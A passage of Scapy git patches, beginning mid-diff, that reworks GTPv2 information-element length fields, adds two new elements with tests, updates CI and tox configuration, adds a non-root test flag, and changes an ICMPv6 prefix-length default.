IE_RecoveryRestart(gtp.IE_Base): name = "IE Recovery Restart" fields_desc = [ByteEnumField("ietype", 3, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Recovery Restart", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("restart_counter", 0)] @@ -699,7 +712,8 @@ class IE_AMBR(gtp.IE_Base): class IE_MSISDN(gtp.IE_Base): name = "IE MSISDN" fields_desc = [ByteEnumField("ietype", 76, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="MSISDN", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), gtp.TBCDByteField("digits", "33123456789", @@ -709,7 +723,8 @@ class IE_MSISDN(gtp.IE_Base): class IE_Indication(gtp.IE_Base): name = "IE Indication" fields_desc = [ByteEnumField("ietype", 77, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Indication", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("DAF", 0, 1), @@ -1069,7 +1084,8 @@ def PCO_protocol_dispatcher(s): class IE_PCO(gtp.IE_Base): name = "IE Protocol Configuration Options" fields_desc = [ByteEnumField("ietype", 78, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="PCO", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("Extension", 0, 1), @@ -1082,7 +1098,8 @@ class IE_PCO(gtp.IE_Base): class IE_PAA(gtp.IE_Base): name = "IE PAA" fields_desc = [ByteEnumField("ietype", 79, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="PAA", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1101,7 +1118,8 @@ class IE_PAA(gtp.IE_Base): class IE_Bearer_QoS(gtp.IE_Base): name = "IE Bearer Quality of Service" fields_desc = [ByteEnumField("ietype", 80, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Bearer QoS", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 1), @@ -1119,16 +1137,18 @@ class IE_Bearer_QoS(gtp.IE_Base): class IE_ChargingID(gtp.IE_Base): name = "IE Charging ID" fields_desc = [ByteEnumField("ietype", 94, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Charging ID", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("ChargingID", 0)] class IE_ChargingCharacteristics(gtp.IE_Base): - name = "IE Charging ID" + name = "IE Charging Characteristics" fields_desc = [ByteEnumField("ietype", 95, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Charging Characteristics", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), XShortField("ChargingCharacteristric", 0)] @@ -1137,7 +1157,8 @@ class IE_ChargingCharacteristics(gtp.IE_Base): class IE_PDN_type(gtp.IE_Base): name = "IE PDN Type" fields_desc = [ByteEnumField("ietype", 99, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="PDN Type", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1147,7 +1168,8 @@ class IE_PDN_type(gtp.IE_Base): class IE_UE_Timezone(gtp.IE_Base): name = "IE UE Time zone" fields_desc = [ByteEnumField("ietype", 114, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="UE Time zone", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("Timezone", 0), @@ -1157,7 +1179,8 @@ class IE_UE_Timezone(gtp.IE_Base): class IE_Port_Number(gtp.IE_Base): name = "IE Port Number" fields_desc = [ByteEnumField("ietype", 126, IEType), - ShortField("length", 2), + FieldLenField("length", None, length_of="Port Number", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ShortField("PortNumber", RandShort())] @@ -1166,7 +1189,8 @@ class IE_Port_Number(gtp.IE_Base): class IE_APN_Restriction(gtp.IE_Base): name = "IE APN Restriction" fields_desc = [ByteEnumField("ietype", 127, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="APN Restriction", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), ByteField("APN_Restriction", 0)] @@ -1175,7 +1199,8 @@ class IE_APN_Restriction(gtp.IE_Base): class IE_SelectionMode(gtp.IE_Base): name = "IE Selection Mode" fields_desc = [ByteEnumField("ietype", 128, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Selection Mode", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 6), @@ -1185,7 +1210,8 @@ class IE_SelectionMode(gtp.IE_Base): class IE_MMBR(gtp.IE_Base): name = "IE Max MBR/APN-AMBR (MMBR)" fields_desc = [ByteEnumField("ietype", 161, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="MMBR", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), IntField("uplink_rate", 0), @@ -1195,7 +1221,8 @@ class IE_MMBR(gtp.IE_Base): class IE_UPF_SelInd_Flags(gtp.IE_Base): name = "IE UP Function Selection Indication Flags" fields_desc = [ByteEnumField("ietype", 202, IEType), - ShortField("length", 0), + FieldLenField("length", None, length_of="UP Function Selection Indication Flags", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 7), @@ -1207,7 +1234,8 @@ class IE_PrivateExtension(gtp.IE_Base): name = "Private Extension" fields_desc = [ ByteEnumField("ietype", 255, IEType), - ShortField("length", None), + FieldLenField("length", None, length_of="Private Extension", + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("SPARE", 0, 4), BitField("instance", 0, 4), ShortEnumField("enterprisenum", None, IANA_ENTERPRISE_NUMBERS), From f34f10a736627ceb7ae93af223e35f439611d3e1 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 16 Mar 2020 17:23:15 -0400 Subject: [PATCH 0022/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 96c626dbde1..de9bbc7a4f0 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -401,7 +401,7 @@ class IE_ULI(gtp.IE_Base): fields_desc = [ ByteEnumField("ietype", 86, IEType), FieldLenField("length", None, length_of="User Location Information", - adjust=lambda pkt, x: x + 4, fmt="H"), + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 2), @@ -1147,7 +1147,8 @@ class IE_ChargingID(gtp.IE_Base): class IE_ChargingCharacteristics(gtp.IE_Base): name = "IE Charging Characteristics" fields_desc = [ByteEnumField("ietype", 95, IEType), - FieldLenField("length", None, length_of="Charging Characteristics", + FieldLenField("length", None, length_of= + "Charging Characteristics", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1221,7 +1222,8 @@ class IE_MMBR(gtp.IE_Base): class IE_UPF_SelInd_Flags(gtp.IE_Base): name = "IE UP Function Selection Indication Flags" fields_desc = [ByteEnumField("ietype", 202, IEType), - FieldLenField("length", None, length_of="UP Function Selection Indication Flags", + FieldLenField("length", None, length_of= + "UP Function Selection Indication Flags", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1235,7 +1237,7 @@ class IE_PrivateExtension(gtp.IE_Base): fields_desc = [ ByteEnumField("ietype", 255, IEType), FieldLenField("length", None, length_of="Private Extension", - adjust=lambda pkt, x: x + 4, fmt="H"), + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("SPARE", 0, 4), BitField("instance", 0, 4), ShortEnumField("enterprisenum", None, IANA_ENTERPRISE_NUMBERS), From 51a9e281b01ca0ec78c1e06ae8e26b9db8e27559 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 16 Mar 2020 17:35:32 -0400 Subject: [PATCH 0023/1632] Update gtp_v2.py --- scapy/contrib/gtp_v2.py | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index de9bbc7a4f0..4711b25b954 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -401,7 +401,7 @@ class IE_ULI(gtp.IE_Base): fields_desc = [ ByteEnumField("ietype", 86, IEType), FieldLenField("length", None, length_of="User Location Information", - adjust=lambda pkt, x: x + 4, fmt="H"), + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 2), @@ -1147,8 +1147,8 @@ class IE_ChargingID(gtp.IE_Base): class IE_ChargingCharacteristics(gtp.IE_Base): name = "IE Charging Characteristics" fields_desc = [ByteEnumField("ietype", 95, IEType), - FieldLenField("length", None, length_of= - "Charging Characteristics", + FieldLenField("length", None, + length_of="Charging Characteristics", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1222,8 +1222,9 @@ class IE_MMBR(gtp.IE_Base): class IE_UPF_SelInd_Flags(gtp.IE_Base): name = "IE UP Function Selection Indication Flags" fields_desc = [ByteEnumField("ietype", 202, IEType), - FieldLenField("length", None, length_of= - "UP Function Selection Indication Flags", + FieldLenField("length", None, + length_of="UP Function Selection" + + "Indication Flags", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1237,7 +1238,7 @@ class IE_PrivateExtension(gtp.IE_Base): fields_desc = [ ByteEnumField("ietype", 255, IEType), FieldLenField("length", None, length_of="Private Extension", - adjust=lambda pkt, x: x + 4, fmt="H"), + adjust=lambda pkt, x: x + 4, fmt="H"), BitField("SPARE", 0, 4), BitField("instance", 0, 4), ShortEnumField("enterprisenum", None, IANA_ENTERPRISE_NUMBERS), From 6d1bbb238a9a994e4f3da2fd59163d6a74b8ac29 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 16 Mar 2020 19:04:08 -0400 Subject: [PATCH 0024/1632] New 2 IEs --- scapy/contrib/gtp_v2.py | 32 +++++++++++++++++++++++++++++++- 1 file changed, 31 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 4711b25b954..1f6dbd3979c 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -219,8 +219,10 @@ 126: "Port Number", 127: "APN Restriction", 128: "Selection Mode", + 132: "FQ-CSID", 145: "UCI", 161: "Max MBR/APN-AMBR (MMBR)", + 172: "RAN/NAS Cause", 202: "UP Function Selection Indication Flags", 255: "Private Extension", } @@ -400,7 +402,8 @@ class IE_ULI(gtp.IE_Base): name = "IE User Location Information" fields_desc = [ ByteEnumField("ietype", 86, IEType), - FieldLenField("length", None, length_of="User Location Information", + FieldLenField("length", None, + length_of="User Location Information", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), @@ -1232,6 +1235,31 @@ class IE_UPF_SelInd_Flags(gtp.IE_Base): BitField("DCNR", 0, 1)] +class IE_FQCSID(gtp.IE_Base): + name = "IE FQ-CSID" + fields_desc = [ByteEnumField("ietype", 132, IEType), + FieldLenField("length", None, length_of="FQ-CSID", + adjust=lambda pkt, x: x + 4, fmt="H"), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("nodeid_type", 0, 4), + BitField("num_csid", 0, 4), + ByteField("node_id", 0), + ByteField("csids", 0)] + + +class IE_Ran_Nas_Cause(gtp.IE_Base): + name = "IE RAN/NAS Cause" + fields_desc = [ByteEnumField("ietype", 172, IEType), + FieldLenField("length", None, length_of="RAN/NAS Cause", + adjust=lambda pkt, x: x + 4, fmt="H"), + BitField("CR_flag", 0, 4), + BitField("instance", 0, 4), + BitField("protocol_type", 0, 4), + BitField("cause_type", 0, 4), + ByteField("cause_value", 0)] + + # 3GPP TS 29.274 v16.1.0 section 8.67. class IE_PrivateExtension(gtp.IE_Base): name = "Private Extension" @@ -1275,8 +1303,10 @@ def extract_padding(self, s): 126: IE_Port_Number, 127: IE_APN_Restriction, 128: IE_SelectionMode, + 132: IE_FQCSID, 145: IE_UCI, 161: IE_MMBR, + 172: IE_Ran_Nas_Cause, 202: IE_UPF_SelInd_Flags, 255: IE_PrivateExtension} From c6d3a011fa94b5ba19af4cd644d9ecfc81b450e3 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Mon, 16 Mar 2020 19:05:20 -0400 Subject: [PATCH 0025/1632] Update gtp_v2.uts --- test/contrib/gtp_v2.uts | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index 1078a033605..afb0c27add6 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -248,6 +248,16 @@ ie.DCNR == 0 ie = IE_UPF_SelInd_Flags(ietype='UP Function Selection Indication Flags', length=1, CR_flag=0, instance=0, SPARE=0, DCNR=0) ie.ietype == 202 and ie.DCNR == 0 += IE_Ran_Nas_Cause, dissection +h = "00000000000000000000000008004500005a0000000040114d390101010101010102084b084b0046bf694824000e000ba0df00002300ac0002003011" +gtp = Ether(hex_bytes(h)) +ie = gtp.IE_list[0] +ie.protocol_type == 3 and ie.cause_type == 0 and ie.cause_value == 17 + += IE_Ran_Nas_Cause, basic instantiation +ie = IE_Ran_Nas_Cause(ietype='RAN/NAS Cause', length=2, CR_flag=0, instance=0, protocol_type=3, cause_type=0, cause_value=17) +ie.ietype == 172 and ie.protocol_type == 3 and ie.cause_type == 0 and ie.cause_value == 17 + = IE_FTEID, dissection h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) From d3e1483b0e28aaf9222835eb4792547d2fd1f485 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Wed, 18 Mar 2020 14:49:18 -0400 Subject: [PATCH 0026/1632] Restore old msisdn len field --- scapy/contrib/gtp_v2.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index 1f6dbd3979c..222e7e4c201 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -715,7 +715,7 @@ class IE_AMBR(gtp.IE_Base): class IE_MSISDN(gtp.IE_Base): name = "IE MSISDN" fields_desc = [ByteEnumField("ietype", 76, IEType), - FieldLenField("length", None, length_of="MSISDN", + FieldLenField("length", None, length_of="digits", adjust=lambda pkt, x: x + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), From 6bebf259bc9a5ca1f90855a7a3076bd19924312d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 22 Mar 2020 13:56:14 +0100 Subject: [PATCH 0027/1632] Run non root tests on Github CI --- .config/ci/install.sh | 4 +--- .config/ci/test.sh | 13 ++++++------ .github/workflows/unittests.yml | 37 ++++++++++++++++++--------------- .travis.yml | 33 ++++++++++------------------- scapy/asn1/asn1.py | 3 ++- scapy/tools/UTscapy.py | 8 +++++-- tox.ini | 6 +++--- 7 files changed, 50 insertions(+), 54 deletions(-) diff --git a/.config/ci/install.sh b/.config/ci/install.sh index 8bc97753a0e..e7b13c206eb 100755 --- a/.config/ci/install.sh +++ b/.config/ci/install.sh @@ -29,8 +29,6 @@ python -m pip install --upgrade pip setuptools --ignore-installed # Make sure tox is installed and up to date python -m pip install -U tox --ignore-installed -# Make sure brotli is installed and up to date -python -m pip install -U brotli --ignore-installed - # Dump Environment (so that we can check PATH, UT_FLAGS, etc.) +openssl version set diff --git a/.config/ci/test.sh b/.config/ci/test.sh index beae06885c5..f72e7720f4b 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -32,6 +32,7 @@ fi # Create version tag (github actions) PY_VERSION="py${1//./}" +PY_VERSION=${PY_VERSION/pypypy/pypy} TESTVER="$PY_VERSION-$OSTOX" # Chose whether to run root or non_root @@ -51,13 +52,13 @@ if [ -z $TOXENV ] then case ${SCAPY_TOX_CHOSEN} in both) - TOXENV="${TESTVER}_non_root,${TESTVER}_root" + export TOXENV="${TESTVER}_non_root,${TESTVER}_root" ;; root) - TOXENV="${TESTVER}_root" + export TOXENV="${TESTVER}_root" ;; *) - TOXENV="${TESTVER}_non_root" + export TOXENV="${TESTVER}_non_root" ;; esac fi @@ -67,13 +68,13 @@ echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV # Launch Scapy unit tests -tox -- ${UT_FLAGS} +tox -- ${UT_FLAGS} || exit 1; # Start Scapy in interactive mode TEMPFILE=$(mktemp) -cat << EOF > ${TEMPFILE} +cat << EOF > "${TEMPFILE}" print("Scapy on %s" % sys.version) sys.exit() EOF -./run_scapy -H -c ${TEMPFILE} +./run_scapy -H -c "${TEMPFILE}" || exit 1; rm ${TEMPFILE} diff --git a/.github/workflows/unittests.yml b/.github/workflows/unittests.yml index 0abfd7c97ca..a1922d6a91c 100644 --- a/.github/workflows/unittests.yml +++ b/.github/workflows/unittests.yml @@ -4,6 +4,7 @@ on: [push, pull_request] jobs: health: + name: Code health check runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 @@ -20,6 +21,7 @@ jobs: - name: Run twine check run: tox -e twine docs: + name: Build doc runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 @@ -32,6 +34,7 @@ jobs: - name: Build docs run: tox -e docs mypy: + name: Type hints check runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 @@ -44,20 +47,20 @@ jobs: - name: Run mypy run: tox -e mypy -# Github Actions block ICMP. We can still use it for non root tests - -# utscapy: -# runs-on: ubuntu-latest -# strategy: -# matrix: -# python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8] -# steps: -# - uses: actions/checkout@v2 -# - name: Setup Python -# uses: actions/setup-python@v1 -# with: -# python-version: ${{ matrix.python }} -# - name: Install Tox and any other packages -# run: ./.config/ghci/install.sh -# - name: Run Tox -# run: ./.config/ghci/test.sh ${{ matrix.python }} non_root + # Github Actions block ICMP. We can still use it for non root tests + utscapy: + name: Non-sudo unit tests + runs-on: ubuntu-latest + strategy: + matrix: + python: [2.7, pypy2, pypy3, 3.5, 3.6, 3.7, 3.8] + steps: + - uses: actions/checkout@v2 + - name: Setup Python + uses: actions/setup-python@v1 + with: + python-version: ${{ matrix.python }} + - name: Install Tox and any other packages + run: ./.config/ci/install.sh + - name: Run Tox + run: ./.config/ci/test.sh ${{ matrix.python }} non_root diff --git a/.travis.yml b/.travis.yml index 3fa091bdd9b..dc5fb3885cf 100644 --- a/.travis.yml +++ b/.travis.yml @@ -6,63 +6,52 @@ cache: jobs: include: - # Run as root + # Run linux as root (non root tested by github ci) - os: linux python: 2.7 env: - - TOXENV=py27-linux_non_root,py27-linux_root,codecov + - TOXENV=py27-linux_root,codecov - os: linux python: pypy env: - - TOXENV=pypy-linux_non_root,pypy-linux_root,codecov + - TOXENV=pypy-linux_root,codecov - os: linux python: pypy3 env: - - TOXENV=pypy3-linux_non_root,pypy3-linux_root,codecov - - - os: linux - python: 3.5 - env: - - TOXENV=py35-linux_root,codecov - - - os: linux - python: 3.6 - env: - - TOXENV=py36-linux_root,codecov - - - os: linux - python: 3.7 - env: - - TOXENV=py37-linux_root,codecov + - TOXENV=pypy3-linux_root,codecov - os: linux python: 3.8 env: - - TOXENV=py38-linux_non_root,py38-linux_root,codecov + - TOXENV=py38-linux_root,codecov + # run OSX - os: osx language: generic env: - TOXENV=py27-bsd_non_root,py27-bsd_root,codecov + - os: osx language: generic env: - TOXENV=py36-bsd_non_root,py36-bsd_root,codecov + # run custom root tests + # isotp - os: linux python: 3.8 env: - TOXENV=py38-isotp_kernel_module,codecov + # libpcap - os: linux python: 3.8 env: - SCAPY_USE_PCAPDNET=yes TOXENV=py38-linux_root,codecov - # Other root tests - # Test scapy against all warnings + # warnings/deprecations - os: linux python: 3.8 env: diff --git a/scapy/asn1/asn1.py b/scapy/asn1/asn1.py index 325c9182021..45eea565707 100644 --- a/scapy/asn1/asn1.py +++ b/scapy/asn1/asn1.py @@ -396,7 +396,8 @@ class ASN1_OID(ASN1_Object): tag = ASN1_Class_UNIVERSAL.OID def __init__(self, val): - val = conf.mib._oid(plain_str(val)) + val = plain_str(val) + val = conf.mib._oid(val) ASN1_Object.__init__(self, val) self.oidname = conf.mib._oidname(val) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index f1577e33a0b..8be1aed6cd6 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -769,6 +769,7 @@ def usage(): -qq\t\t: [silent mode] -x\t\t: use pyannotate -n \t: only tests whose numbers are given (eg. 1,3-7,12) +-N\t\t: force non root -m \t: additional module to put in the namespace -k ,,...\t: include only tests with one of those keywords (can be used many times) -K ,,...\t: remove tests with one of those keywords (can be used many times) @@ -860,6 +861,7 @@ def main(): OUTPUTFILE = sys.stdout LOCAL = 0 NUM = None + NON_ROOT = False KW_OK = [] KW_KO = [] DUMP = 0 @@ -875,7 +877,7 @@ def main(): ANNOTATIONS_MODE = False INTERPRETER = False try: - opts = getopt.getopt(argv, "o:t:T:c:f:hbln:m:k:K:DRdCiFqP:s:x") + opts = getopt.getopt(argv, "o:t:T:c:f:hbln:m:k:K:DRdCiFqNP:s:x") for opt, optarg in opts[0]: if opt == "-h": usage() @@ -950,6 +952,8 @@ def main(): except ValueError: v1, v2 = [int(e) for e in v.split('-', 1)] NUM.extend(range(v1, v2 + 1)) + elif opt == "-N": + NON_ROOT = True elif opt == "-m": MODULES.append(optarg) elif opt == "-k": @@ -965,7 +969,7 @@ def main(): if VERB > 2: print("### Python 2 mode ###") try: - if os.getuid() != 0: # Non root + if NON_ROOT or os.getuid() != 0: # Non root # Discard root tests KW_KO.append("netaccess") KW_KO.append("needs_root") diff --git a/tox.ini b/tox.ini index 0935859a4c5..9eb37fff11e 100644 --- a/tox.ini +++ b/tox.ini @@ -28,9 +28,9 @@ platform = bsd_non_root,bsd_root: darwin|freebsd|openbsd|netbsd windows: win32 commands = - linux_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs} + linux_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 -N {posargs} linux_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c ./test/configs/linux.utsc -K random_weird_py3 {posargs} - bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -K random_weird_py3 {posargs} + bsd_non_root: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -K random_weird_py3 -N {posargs} bsd_root: sudo -E {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/bsd.utsc -K manufdb -K tshark -K random_weird_py3 {posargs} windows: {envpython} {env:SCAPY_PY_OPTS:-m coverage run} -m scapy.tools.UTscapy -c test/configs/windows.utsc -K random_weird_py3 {posargs} coverage combine @@ -90,7 +90,7 @@ commands = python .config/mypy/mypy_check.py description = "Build the docs" skip_install = true changedir = doc/scapy -deps = sphinx<2.4.0 +deps = sphinx>=2.4.2 sphinx_rtd_theme commands = sphinx-build -W --keep-going -b html . _build/html From 930901df5f21e36971831ba3bdfff1b9031ae6ea Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 24 Mar 2020 13:18:15 +0000 Subject: [PATCH 0028/1632] Bypass bug 2542 --- test/regression.uts | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/test/regression.uts b/test/regression.uts index f637e195c34..65606136e41 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12037,6 +12037,9 @@ assert a.src == '00:00:00:00:00:00' = MIB ~ mib +import copy +old_mib = copy.copy(conf.mib) + import tempfile fd, fname = tempfile.mkstemp() os.write(fd, b"-- MIB test\nscapy OBJECT IDENTIFIER ::= {test 2807}\n") @@ -12068,6 +12071,10 @@ def get_mib_graph(do_graph): get_mib_graph() += Restore conf.mib +~ mib +conf.mib = old_mib + = DADict tests a = DADict("test") From 4456dabe842d33097777c59f1b3cc49b7d86e733 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sat, 28 Mar 2020 19:47:04 +0000 Subject: [PATCH 0029/1632] Remove extra ; --- .config/ci/test.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index f72e7720f4b..e59ad741955 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -68,7 +68,7 @@ echo UT_FLAGS=$UT_FLAGS echo TOXENV=$TOXENV # Launch Scapy unit tests -tox -- ${UT_FLAGS} || exit 1; +tox -- ${UT_FLAGS} || exit 1 # Start Scapy in interactive mode TEMPFILE=$(mktemp) @@ -76,5 +76,5 @@ cat << EOF > "${TEMPFILE}" print("Scapy on %s" % sys.version) sys.exit() EOF -./run_scapy -H -c "${TEMPFILE}" || exit 1; +./run_scapy -H -c "${TEMPFILE}" || exit 1 rm ${TEMPFILE} From 3b89d75813f78330407fa8763f455af096f4ce7c Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Sun, 22 Mar 2020 10:33:28 +0100 Subject: [PATCH 0030/1632] Use 64 bits for the default prefix length --- scapy/layers/inet6.py | 2 +- test/regression.uts | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 6b50d1fd6be..0cef7870148 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1677,7 +1677,7 @@ class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): name = "ICMPv6 Neighbor Discovery Option - Prefix Information" fields_desc = [ByteField("type", 3), ByteField("len", 4), - ByteField("prefixlen", None), + ByteField("prefixlen", 64), BitField("L", 1, 1), BitField("A", 1, 1), BitField("R", 0, 1), diff --git a/test/regression.uts b/test/regression.uts index 65606136e41..f163309ed04 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -3227,7 +3227,7 @@ a.type == 2 and a.len == 2 and a.lladdr == "11:11:11:11:11:11" + ICMPv6NDOptPrefixInfo Class Test = ICMPv6NDOptPrefixInfo - Basic Instantiation -raw(ICMPv6NDOptPrefixInfo()) == b'\x03\x04\x00\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(ICMPv6NDOptPrefixInfo()) == b'\x03\x04@\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' = ICMPv6NDOptPrefixInfo - Instantiation with specific values raw(ICMPv6NDOptPrefixInfo(len=5, prefixlen=64, L=0, A=0, R=1, res1=1, validlifetime=0x11111111, preferredlifetime=0x22222222, res2=0x33333333, prefix="2001:db8::1")) == b'\x03\x05@!\x11\x11\x11\x11""""3333 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' @@ -6013,15 +6013,15 @@ p = IPv6(s) p[ICMPv6MPSol].cksum == 0x2808 and p[ICMPv6MPSol].id == 8 = ICMPv6MPAdv - build (default values) -s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00\xe8\xd6\x00\x00\x80\x00\x03\x04\x00\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +s = b'`\x00\x00\x00\x00(:@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x93\x00\xa8\xd6\x00\x00\x80\x00\x03\x04@\xc0\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' 